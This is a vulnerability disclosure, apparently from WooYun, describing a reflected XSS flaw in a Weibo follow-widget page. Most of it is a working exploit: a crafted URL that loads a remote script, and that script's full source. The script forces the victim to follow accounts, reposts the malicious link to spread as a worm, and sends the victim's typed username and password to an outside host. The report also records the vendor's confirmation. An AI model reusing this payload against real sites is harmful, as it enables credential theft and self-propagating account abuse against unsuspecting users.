2013-05-08: 细节已通知厂商并且等待厂商处理中 2013-05-08: 厂商已经确认,细节仅向厂商公开 2013-05-18: 细节向核心白帽子及相关领域专家公开 2013-05-28: 细节向普通白帽子公开 2013-06-07: 细节向实习白帽子公开 2013-06-22: 细节向公众公开
某常用页面的参数未过滤,附XSS利用过程。已帮忙关注乌云了,大家也来关注一下吧~~安全意识高的人越来越多了,看到weibo.com的域名也不点,反射型的XSS真心难,求持久化思路。
1.http://widget.weibo.com/dialog/follow.php 加关注页面,vsrc参数未过滤。2.http://widget.weibo.com/dialog/follow.php?fuid=1922455660&refer=&language=zh_cn&type=widget_page&vsrc=app_followbutton%27%7D%3Bonload=function%28%29%7BSTK.scriptLoader%28%7Burl%3A%27http%3A%2F%2Fmxss.sinaapp.com%2Ffish.js%27%7D%29%7D%3Bb%3D%7Ba%3A%27
3.该页面有登录框,就不用自己写登录框了:)。
/*进来后提交关注和发送微博,并点击“换个账号按钮”,显示登录框;给登录按钮和回车事件增加了发到g.php的动作;STK.jsonp来提交到g.php,STK.ajax来关注和发微博;后来又增加了发微话题,这个是有检查referer的,所以用一个iframe来做。*/var xss_url = "http://widget.weibo.com/dialog/follow.php?fuid=1922455660&refer=&language=zh_cn&type=widget_page&vsrc=app_followbutton%27%7D%3Bonload=function%28%29%7BSTK.scriptLoader%28%7Burl%3A%27http%3A%2F%2Fmxss.sinaapp.com%2Ffish.js%27%7D%29%7D%3Bb%3D%7Ba%3A%27&r="+Math.random();var blogs = ['[BOBO害羞]看我如何一夜粉丝十万:', '有什么新鲜事想告诉大家?', '[lt切克闹]唷唷,切克闹。', '马刺VS勇士,加时赛。', '太贫困的人是不能重用,俗话说好日子过惯了难过穷日子。', '人们常常用咄咄逼人来掩饰弱点,只有软骨头才急躁粗暴,他们因此丧失了人的尊严。', '我等待,我观看。恩惠也许来,也许不来。', '也许这种既平静又不平静的等待就是恩惠的使者,或恩惠本身。', '京华记者现场对阵农夫山泉,8问8答激辩。', '爆灯姐丁东丽遭吐槽。', '淘宝客:中小卖家淘宝客运营实战篇。', '我们中出了2个叛徒,必须烧死。[蜡烛][蜡烛][蜡烛]', '次奥,这个炸弹两面都有胶![崩溃]', '我不行了,这是我的申请书......', '敌人叫我们投降,我从了', '炸弹已安置完毕,请求撤离。队长,队长?' ];var blog = blogs[Math.floor(Math.random()*blogs.length+1)];var topic = "#报告队长#";var logout_link = document.getElementsByClassName("logout_link")[0];function m_post(){ //show fish form if(logout_link) logout_link.click(); //follow wooyun STK.ajax({url:"/relationship/aj_attention.php",method:'post',args:{uid:1981622273}, onComplete:function(){ //follow me STK.ajax({url:"/relationship/aj_attention.php",method:'post',args:{uid:1922455660}, onComplete:function(){ //add blog STK.ajax({url:"/public/aj_addMblog.php",method:'post',args:{content:encodeURIComponent(blog+xss_url),appkey:1629860458}, onComplete:function(){ //create topic blog iframe var ifm = document.createElement("iframe"); ifm.src = "/livestream/listlive.php"; ifm.style.display = "none"; ifm.id="m_topic_ifm"; document.body.appendChild(ifm); //add topic blog ifm.onload = function(){ ifm.contentWindow.STK.ajax({url:"/livestream/addmblog.php",method:'post',args:{content:encodeURIComponent(encodeURIComponent(topic+blog+xss_url)),appkey:2191225368,refer:'www.google.com.hk',language:'zh_cn',url_param:'',_t:0}}); } }}); }}); }});}//fishvar m_submit = document.getElementsByClassName("submit_login_btn WB_btnD")[0];if(m_submit){ m_submit.onclick = function(){ var name = document.getElementsByClassName("WB_input input_account")[0].value; var pass = document.getElementsByClassName("WB_input input_password")[0].value; STK.jsonp({url:"http://mxss.sinaapp.com/g.php?n="+encodeURIComponent(name)+"&p="+encodeURIComponent(pass)}); //post again setTimeout(function(){m_post()},2000); } document.onkeydown = function(e){ var num = (e!=undefined)?e.keyCode:window.event.keyCode; if(num == 13){ m_submit.onclick(); } }}m_post();
一进来就有提交
输入密码后提交并再次关注下
账号密码来咯
某人已关注并add blog
过滤噻。
危害等级:中
漏洞Rank:10
确认时间:2013-05-08 13:51
感谢关注新浪安全,已进入内部修复流程。
暂无
可以猥琐思路
@Millet 精了~
( 实习白帽子 | Rank:1113 漏洞数:141 | M:出售GOV STATE NSA CIA NASA DHS Symant...)